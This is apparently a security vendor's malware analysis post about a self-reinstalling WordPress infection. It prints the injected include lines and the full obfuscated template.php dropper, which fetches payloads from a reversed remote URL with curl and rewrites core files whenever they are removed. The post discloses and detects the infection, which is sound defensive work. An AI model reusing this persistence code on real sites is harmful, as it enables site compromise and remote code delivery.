Today we found undetected malware, which keep it hidden and try loading again if it deleted.
We generated Signatures to Detect these hidden includes:
/index.php: {HEX}Malware.Expert.wordpress.hidden.include.0.UNOFFICIAL FOUND /wp-load.php: {HEX}Malware.Expert.wordpress.hidden.include.1.UNOFFICIAL FOUND /wp-includes/template.php: {HEX}Malware.Expert.malware.url.7od.info.0.UNOFFICIAL FOUND /wp-includes/Requests/IPconfig.ini: {HEX}Malware.Expert.generic.malware.39.UNOFFICIAL FOUND /wp-includes/js/utilities.js: {HEX}Malware.Expert.generic.malware.39.UNOFFICIAL FOUND
WordPress
index.php
<?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */@include( dirname( __FILE__ ) . '/wp-includes/js/utilities.js' ); /**
wp-load.php
End of file:
} // Network host configuration. Not recommended edit this code! @include ( ABSPATH . WPINC . '/Requests/IPconfig.ini' );
template.php
error_reporting(0); $wp_support = strrev ( '/wordpress/ofni.do7//:ptth' ); if ( is_file ( './index.php' ) == false ) { $wp_up_data = curl_init ( $wp_support.'index' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 ); $wp_ip_data = curl_exec ( $wp_up_data ); curl_close ( $wp_up_data ); unlink ( './index.php' ); file_put_contents ( './index.php', $wp_ip_data ); } if ( is_file ( './index.php' ) ) { if ( filesize ( './index.php' ) <= 498 OR filesize ( './index.php' ) >= 501 ) { $wp_up_data = curl_init ( $wp_support.'index' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 ); $wp_ip_data = curl_exec ( $wp_up_data ); curl_close ( $wp_up_data ); unlink ( './index.php' ); file_put_contents ( './index.php', $wp_ip_data ); } } if ( is_file ( ABSPATH . WPINC . '/js/utilities.js' ) == false ) { $wp_up_data = curl_init ( $wp_support.'utilities' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 ); $wp_ip_data = curl_exec ( $wp_up_data ); curl_close ( $wp_up_data ); unlink ( ABSPATH . WPINC . '/js/utilities.js' ); file_put_contents ( ABSPATH . WPINC . '/js/utilities.js', $wp_ip_data ); } if ( is_file ( ABSPATH . WPINC . '/js/utilities.js' ) ) { if ( filesize ( ABSPATH . WPINC . '/js/utilities.js' ) <= 77100 OR filesize ( ABSPATH . WPINC . '/js/utilities.js' ) >= 88100 ) { $wp_up_data = curl_init ( $wp_support.'utilities' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 ); $wp_ip_data = curl_exec ( $wp_up_data ); curl_close ( $wp_up_data ); unlink ( ABSPATH . WPINC . '/js/utilities.js' ); file_put_contents ( ABSPATH . WPINC . '/js/utilities.js', $wp_ip_data ); } } if ( is_file ( './wp-content/uploads/slideshow/cache.ini' ) == false ) { if ( is_file ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ) == false ) { $wp_up_data = curl_init ( $wp_support.'ipconfig' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 ); $wp_ip_data = curl_exec ( $wp_up_data ); curl_close ( $wp_up_data ); unlink ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ); file_put_contents ( ABSPATH . WPINC . '/Requests/IPconfig.ini', $wp_ip_data ); } if ( is_file ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ) ) { if ( filesize ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ) <= 77100 OR filesize ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ) >= 88100 ) { $wp_up_data = curl_init ( $wp_support.'ipconfig' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 ); $wp_ip_data = curl_exec ( $wp_up_data ); curl_close ( $wp_up_data ); unlink ( ABSPATH . WPINC . '/Requests/IPconfig.ini' ); file_put_contents ( ABSPATH . WPINC . '/Requests/IPconfig.ini', $wp_ip_data ); } } if ( stripos ( file_get_contents ( './wp-load.php' ), 'IPconfig.ini' ) == false ) { $wp_up_data = curl_init ( $wp_support.'wpload' ); curl_setopt ( $wp_up_data, CURLOPT_TIMEOUT, 100 ); curl_setopt ( $wp_up_data, CURLOPT_RETURNTRANSFER, 1 ); $wp_ip_data = curl_exec ( $wp_up_data ); curl_close ( $wp_up_data ); file_put_contents ( './wp-load.php', $wp_ip_data, FILE_APPEND ); } }
IPconfig.ini
Remove file
utilities.js
Remove file
Final Words
Use Malware Expert – Signatures detect this malware from files for FREE!